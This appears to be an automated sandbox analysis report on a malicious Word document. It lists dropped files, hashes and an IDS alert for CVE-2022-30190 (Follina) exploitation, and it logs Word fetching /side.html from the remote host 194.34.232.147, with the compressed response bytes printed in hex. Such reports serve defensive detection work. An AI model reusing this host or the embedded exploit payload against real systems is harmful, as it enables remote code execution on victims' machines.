      SSDEEP:6:I3DPcFw+aH9RvxggLRFoCGNwvqURXv//4tfnRujlw//+GtluJ/eRuj:I3DPUw+aHbeDwXvYg3J/
      MD5:FFD46519FA0CC2BAB75D9ADD678461E2
      SHA1:3D4CF009840FAA9792B7DB0F8055C83A7A004BC8
      SHA-256:EEE52A2320047E0C74D606A5B0E9205CBE6399AF09A94F81C5E4EC7BE277A70C
      SHA-512:D9760FD7B3ACFBE5437F06144B45EEC6C1DEBB2C404CA7E7931E60DC88EBA98009275A60A8B68B4257973F4B1F865640A0718A081ACFC79813C1FF0D7ECDCC14
      Malicious:false
      Preview:......M.eFy...zB^\/...I..w.Y.a.S,...X.F...Fa.q...............................a{.M.^..............E.....A...0...0.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.025528638812955824
      Encrypted:false
      SSDEEP:6:I3DPcbj6ixbvxggLR7txRglj2whtRXv//4tfnRujlw//+GtluJ/eRuj:I3DP8JxbX1whTvYg3J/
      MD5:6148415D8ACB2269EEB5B4047FD77CD2
      SHA1:9D0C2C09EAB11413904368E10610091452C674AD
      SHA-256:5248168284CDEFA8DF7694A1D40F3272A8DF1037097D66E99E8153866129597E
      SHA-512:7D123E42AB6B4A8497D20D37E58BFA17FA61C8573AAD1CCB47B0446EE1773FA2F260FDFD93A187AF585833605767E427C77F3B3B028FD013995ACD1A48315B26
      Malicious:false
      Preview:......M.eFy...z..*..t.H.G]..'u&S,...X.F...Fa.q...............................fru.H.y.8G.#..............8I..G...}`.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jun 16 19:30:05 2022, mtime=Thu Jun 16 19:30:05 2022, atime=Thu Jun 16 19:30:16 2022, length=24152, window=hide
      Category:dropped
      Size (bytes):1019
      Entropy (8bit):4.569362549090478
      Encrypted:false
      SSDEEP:12:8aJhz080gXg/XAlCPCHaXNBQtB/LJUPlxX+WTd/4hGQzjuicvbPx4OGQzNDtZ3Yn:8+rk/XT9SkXP/4hG+NepGkDv3qqY7h
      MD5:DDB9BAB4CC337F3A2C4D5C17BD3F56A4
      SHA1:1A72699906E116884A57D4BB518EE2EB0E3889ED
      SHA-256:FD5F3A81DBB885BBAF9069A978B461DDEE5B949D5464B1A3A706449D132C1045
      SHA-512:A7578881DD094DB30510062187CA1B8EC95697FFD5493AAB1849164801B062C30638617EE39B2B1B176007126257A6B21C41C3408A4E6D377FDD08D0FBF8F4E7
      Malicious:false
      Preview:L..................F.... ..................&....X^...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1......T...Desktop.d......QK.X.T.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2.X^...T. .5YMH6S~1.DOC..L.......T..T.*.........................5.Y.M.h.6.S.8.Q.V.r...d.o.c.x.......y...............-...8...[............?J......C:\Users\..#...................\\928100\Users.user\Desktop\5YMh6S8QVr.docx.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.5.Y.M.h.6.S.8.Q.V.r...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......928100..........D_....3N...W...9...N..... .....[D_....3N...W...9.
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):72
      Entropy (8bit):4.891962939381966
      Encrypted:false
      SSDEEP:3:bDuMJlg6kVomxWYQT6kVov:bCbjyTjy
      MD5:F580E428B27FE8CDD2DFDF11416A59D1
      SHA1:1FA19247725D97E2F4C8E6BE9326A53486547D8C
      SHA-256:C4378270A2A9AF816B3CD1F288530B2ED493637B539EA32BC032D1264885F961
      SHA-512:93ECF927FF03A64F49F7382D6793CBE97F6CFBC4189B1D62FF785B748ACAC8D1E85A37403F6AE1C4FFDBEC340A709EB06E02C92533EEB88EDDC15B4F8211AC88
      Malicious:false
      Preview:[folders]..Templates.LNK=0..5YMh6S8QVr.LNK=0..[misc]..5YMh6S8QVr.LNK=0..
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):162
      Entropy (8bit):2.4797606462020303
      Encrypted:false
      SSDEEP:3:vrJlaCkWtVyAI/ugXImW4eedln:vdsCkWtpIGgXvdl
      MD5:1674A1C7C99CD9FAADA789F5E2AEB335
      SHA1:26D9E81D5ED584A899A94D5EA8945A5AE3403F85
      SHA-256:BB5F0D32E0E1C8B6865FCE4AE1FC50E34CA954B89E771364A6BE6627F7C726B6
      SHA-512:B2225E8F93F06FFE32B4FDF987D5134BB06F1B0874509E1CC973FD4D30B0F1341CB1AE72FBE9C282A65794A130E2D9C8D4939B789492BC1BCC96394C5F03E02C
      Malicious:false
      Preview:.user..................................................A.l.b.u.s.............p........12..............22.............@32..............32.....z.......p42.....x...
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:Little-endian UTF-16 Unicode text, with no line terminators
      Category:dropped
      Size (bytes):2
      Entropy (8bit):1.0
      Encrypted:false
      SSDEEP:3:Qn:Qn
      MD5:F3B25701FE362EC84616A93A45CE9998
      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
      Malicious:false
      Preview:..
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):162
      Entropy (8bit):2.4797606462020303
      Encrypted:false
      SSDEEP:3:vrJlaCkWtVyAI/ugXImW4eedln:vdsCkWtpIGgXvdl
      MD5:1674A1C7C99CD9FAADA789F5E2AEB335
      SHA1:26D9E81D5ED584A899A94D5EA8945A5AE3403F85
      SHA-256:BB5F0D32E0E1C8B6865FCE4AE1FC50E34CA954B89E771364A6BE6627F7C726B6
      SHA-512:B2225E8F93F06FFE32B4FDF987D5134BB06F1B0874509E1CC973FD4D30B0F1341CB1AE72FBE9C282A65794A130E2D9C8D4939B789492BC1BCC96394C5F03E02C
      Malicious:false
      Preview:.user..................................................A.l.b.u.s.............p........12..............22.............@32..............32.....z.......p42.....x...
      File type:Zip archive data, at least v1.0 to extract
      Entropy (8bit):7.851752527928244
      TrID:
      • Word Microsoft Office Open XML Format document (49504/1) 49.01%
      • Word Microsoft Office Open XML Format document (43504/1) 43.07%
      • ZIP compressed archive (8000/1) 7.92%
      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
      File name:5YMh6S8QVr.docx
      File size:24152
      MD5:5a0d45f97ee4b248360b6b2e5eb4706a
      SHA1:e2a00e3489ede1ac935c78b99f92fdce0e74ed69
      SHA256:57b27abbe3d3c0c20cdc1b408ff6fa562ba5f04fa555cb3adb9dcb03e273b664
      SHA512:049025898f837d37306201a903ebb8507bcc12f9d7f4625436f482964c8741c592daae5a05ac549169426cbd030473f540f6018ee8860e0adb120864141fce9d
      SSDEEP:384:C00MWEg9fPCxoNHfn5yAehqbhtgyhdCxi556BhVyH111/eehvcLO6UD6Vz:0MWE0nNv5yHcttg6dwc5YhVueu/Yh
      TLSH:E5B2BFF4C129646DC60F79B0D13B1BCAF3DC469E73102D893A099386762BB836B71E16
      File Content Preview:PK.........b!S................docProps/UT...6p/a6p/aux.............PK..........!.+L..............docProps/app.xmlUT...........ux..............R.N.0..#..Q......f.......6..r&..c[.....x.!.7|.y.~~.l.z.m....w..^Ue.N...~S>4.N....r......#.W........A*X....R..B..p
      Icon Hash:e4e6a2a2a4b4b4a4
      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
      194.34.232.147192.168.2.2280491762036726 06/16/22-13:30:49.826105TCP2036726ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190)8049176194.34.232.147192.168.2.22
      TimestampSource PortDest PortSource IPDest IP
      Jun 16, 2022 13:30:34.256061077 CEST4917380192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:34.278186083 CEST8049173194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:34.278311014 CEST4917380192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:34.278503895 CEST4917380192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:34.300163984 CEST8049173194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:34.300235033 CEST8049173194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:34.300353050 CEST4917380192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:39.305653095 CEST8049173194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:39.305811882 CEST4917380192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:40.048623085 CEST4917480192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:40.070714951 CEST8049174194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:40.070858955 CEST4917480192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:40.071022034 CEST4917480192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:40.092817068 CEST8049174194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:40.092865944 CEST8049174194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:40.304702044 CEST4917480192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:40.319480896 CEST8049174194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:40.319648027 CEST4917480192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:44.055259943 CEST4917580192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:44.077171087 CEST8049175194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:44.077292919 CEST4917580192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:44.077538967 CEST4917580192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:44.099119902 CEST8049175194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:44.099335909 CEST8049175194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:44.298681974 CEST4917580192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:45.009751081 CEST4917580192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:45.031981945 CEST8049175194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:45.098196030 CEST8049174194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:45.098335981 CEST4917480192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:45.099926949 CEST4917480192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:45.121615887 CEST8049174194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:45.234683990 CEST4917580192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:45.898957968 CEST4917580192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:45.921478033 CEST8049175194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:45.949501038 CEST4917380192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:45.950061083 CEST4917680192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:45.972003937 CEST8049173194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:45.972064018 CEST8049176194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:45.972155094 CEST4917680192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:45.972383976 CEST4917680192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:45.995964050 CEST8049176194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:45.996649981 CEST8049176194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:45.996728897 CEST4917680192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:46.123972893 CEST4917580192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:46.204092979 CEST4917680192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:46.226705074 CEST8049176194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:46.226790905 CEST4917680192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:46.648745060 CEST4917680192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:46.670380116 CEST8049176194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:46.670545101 CEST4917680192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:46.761102915 CEST4917780192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:46.782664061 CEST8049177194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:46.784399033 CEST4917780192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:46.797122955 CEST4917780192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:46.818643093 CEST8049177194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:46.818716049 CEST8049177194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:47.029990911 CEST4917780192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:48.832266092 CEST4917580192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:48.854377031 CEST8049175194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:49.057023048 CEST4917580192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:49.742810965 CEST4917580192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:49.764745951 CEST8049175194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:49.804140091 CEST4917680192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:49.826105118 CEST8049176194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:49.826294899 CEST4917680192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:49.977560043 CEST4917580192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:50.034138918 CEST4917680192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:50.055707932 CEST8049176194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:50.055854082 CEST4917680192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:50.293109894 CEST4917680192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:50.315821886 CEST8049176194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:50.315973043 CEST4917680192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:51.823797941 CEST8049177194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:51.824083090 CEST4917780192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:51.824136972 CEST4917780192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:51.845537901 CEST8049177194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:54.770140886 CEST8049175194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:54.770324945 CEST4917580192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:54.770417929 CEST4917580192.168.2.22194.34.232.147
      Jun 16, 2022 13:30:54.792143106 CEST8049175194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:55.319750071 CEST8049176194.34.232.147192.168.2.22
      Jun 16, 2022 13:30:55.320036888 CEST4917680192.168.2.22194.34.232.147
      Jun 16, 2022 13:31:55.315190077 CEST4917680192.168.2.22194.34.232.147
      • 194.34.232.147
      Session IDSource IPSource PortDestination IPDestination PortProcess
      0192.168.2.2249173194.34.232.14780C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      Jun 16, 2022 13:30:34.278503895 CEST1OUTOPTIONS / HTTP/1.1
      User-Agent: Microsoft Office Protocol Discovery
      Host: 194.34.232.147
      Content-Length: 0
      Connection: Keep-Alive
      Jun 16, 2022 13:30:34.300235033 CEST2INHTTP/1.1 200 OK
      Date: Thu, 16 Jun 2022 11:30:34 GMT
      Server: Apache/2.4.29 (Ubuntu)
      Allow: GET,POST,OPTIONS,HEAD
      Content-Length: 0
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html


      Session IDSource IPSource PortDestination IPDestination PortProcess
      1192.168.2.2249174194.34.232.14780C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      Jun 16, 2022 13:30:40.071022034 CEST3OUTHEAD /side.html HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Microsoft Office Existence Discovery
      Host: 194.34.232.147
      Jun 16, 2022 13:30:40.092865944 CEST3INHTTP/1.1 200 OK
      Date: Thu, 16 Jun 2022 11:30:40 GMT
      Server: Apache/2.4.29 (Ubuntu)
      Last-Modified: Mon, 30 May 2022 20:51:09 GMT
      ETag: "1a76-5e040d0ca4940"
      Accept-Ranges: bytes
      Content-Length: 6774
      Vary: Accept-Encoding
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html
      Jun 16, 2022 13:30:40.319480896 CEST3INHTTP/1.1 200 OK
      Date: Thu, 16 Jun 2022 11:30:40 GMT
      Server: Apache/2.4.29 (Ubuntu)
      Last-Modified: Mon, 30 May 2022 20:51:09 GMT
      ETag: "1a76-5e040d0ca4940"
      Accept-Ranges: bytes
      Content-Length: 6774
      Vary: Accept-Encoding
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html


      Session IDSource IPSource PortDestination IPDestination PortProcess
      2192.168.2.2249175194.34.232.14780C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      Jun 16, 2022 13:30:44.077538967 CEST4OUTOPTIONS / HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
      translate: f
      Host: 194.34.232.147
      Jun 16, 2022 13:30:44.099335909 CEST4INHTTP/1.1 200 OK
      Date: Thu, 16 Jun 2022 11:30:44 GMT
      Server: Apache/2.4.29 (Ubuntu)
      Allow: GET,POST,OPTIONS,HEAD
      Content-Length: 0
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html
      Jun 16, 2022 13:30:45.031981945 CEST5INHTTP/1.1 405 Method Not Allowed
      Date: Thu, 16 Jun 2022 11:30:45 GMT
      Server: Apache/2.4.29 (Ubuntu)
      Allow: GET,POST,OPTIONS,HEAD
      Content-Length: 305
      Keep-Alive: timeout=5, max=99
      Connection: Keep-Alive
      Content-Type: text/html; charset=iso-8859-1
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 33 34 2e 32 33 32 2e 31 34 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 194.34.232.147 Port 80</address></body></html>
      Jun 16, 2022 13:30:45.921478033 CEST6INHTTP/1.1 405 Method Not Allowed
      Date: Thu, 16 Jun 2022 11:30:45 GMT
      Server: Apache/2.4.29 (Ubuntu)
      Allow: GET,POST,OPTIONS,HEAD
      Content-Length: 305
      Keep-Alive: timeout=5, max=98
      Connection: Keep-Alive
      Content-Type: text/html; charset=iso-8859-1
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 33 34 2e 32 33 32 2e 31 34 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 194.34.232.147 Port 80</address></body></html>
      Jun 16, 2022 13:30:48.854377031 CEST10INHTTP/1.1 405 Method Not Allowed
      Date: Thu, 16 Jun 2022 11:30:48 GMT
      Server: Apache/2.4.29 (Ubuntu)
      Allow: GET,POST,OPTIONS,HEAD
      Content-Length: 305
      Keep-Alive: timeout=5, max=97
      Connection: Keep-Alive
      Content-Type: text/html; charset=iso-8859-1
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 33 34 2e 32 33 32 2e 31 34 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 194.34.232.147 Port 80</address></body></html>
      Jun 16, 2022 13:30:49.764745951 CEST11INHTTP/1.1 405 Method Not Allowed
      Date: Thu, 16 Jun 2022 11:30:49 GMT
      Server: Apache/2.4.29 (Ubuntu)
      Allow: GET,POST,OPTIONS,HEAD
      Content-Length: 305
      Keep-Alive: timeout=5, max=96
      Connection: Keep-Alive
      Content-Type: text/html; charset=iso-8859-1
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 34 2e 33 34 2e 32 33 32 2e 31 34 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 194.34.232.147 Port 80</address></body></html>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      3192.168.2.2249176194.34.232.14780C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      Jun 16, 2022 13:30:45.972383976 CEST7OUTGET /side.html HTTP/1.1
      Accept: */*
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      Host: 194.34.232.147
      Connection: Keep-Alive
      Jun 16, 2022 13:30:45.996649981 CEST7INHTTP/1.1 200 OK
      Date: Thu, 16 Jun 2022 11:30:45 GMT
      Server: Apache/2.4.29 (Ubuntu)
      Last-Modified: Mon, 30 May 2022 20:51:09 GMT
      ETag: "1a76-5e040d0ca4940-gzip"
      Accept-Ranges: bytes
      Vary: Accept-Encoding
      Content-Encoding: gzip
      Content-Length: 289
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: text/html
      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed d9 4d 4b c3 30 18 07 f0 fb 60 df 21 16 61 db c1 06 f4 a6 ad e2 db 60 20 32 9c 30 0f 82 a4 c9 b3 36 98 36 25 89 d4 7e 7b 93 81 03 6f 9e c4 c3 3f 04 9e bc 3e bf e4 fc 14 47 ca ca 30 f6 c4 9a d0 9a cb e9 a4 48 91 19 d1 d5 65 46 5d 96 56 2a ab c6 14 bd 74 ba 0f 71 c4 f9 f5 1f 34 38 70 e0 c0 81 03 07 0e 1c 38 70 e0 c0 81 03 07 0e 1c 38 70 e0 c0 81 03 07 0e 9c ff eb b0 d8 06 dd 29 3b e4 c6 4a 11 b4 ed f2 c6 d1 8e 95 2c 6b fd 49 eb 55 38 e7 5a b1 f5 ed f6 4e 8b ba b3 3e 68 c9 b8 7f d7 3d db 59 27 89 f1 5e 38 d1 b2 d7 6c f5 fc f6 44 95 b3 83 a7 a5 75 4b 6d a8 94 c2 5c 49 16 37 36 64 48 86 b5 b3 75 3c 5b 3e da f0 a0 7d 20 95 b6 6e 7e dc 68 8e e7 ab fb 97 f9 2c de 94 39 7d d2 6c b1 d0 3c cf 7f db b7 fb af 78 be 19 63 fa f6 ec 94 b7 bd d7 b5 0f 1f 55 4a 16 1f 99 5d 4c 27 05 3f 94 8b d2 e4 bb 86 c4 f7 65 a6 2f c8 88 30 4c 76 1a 00 00
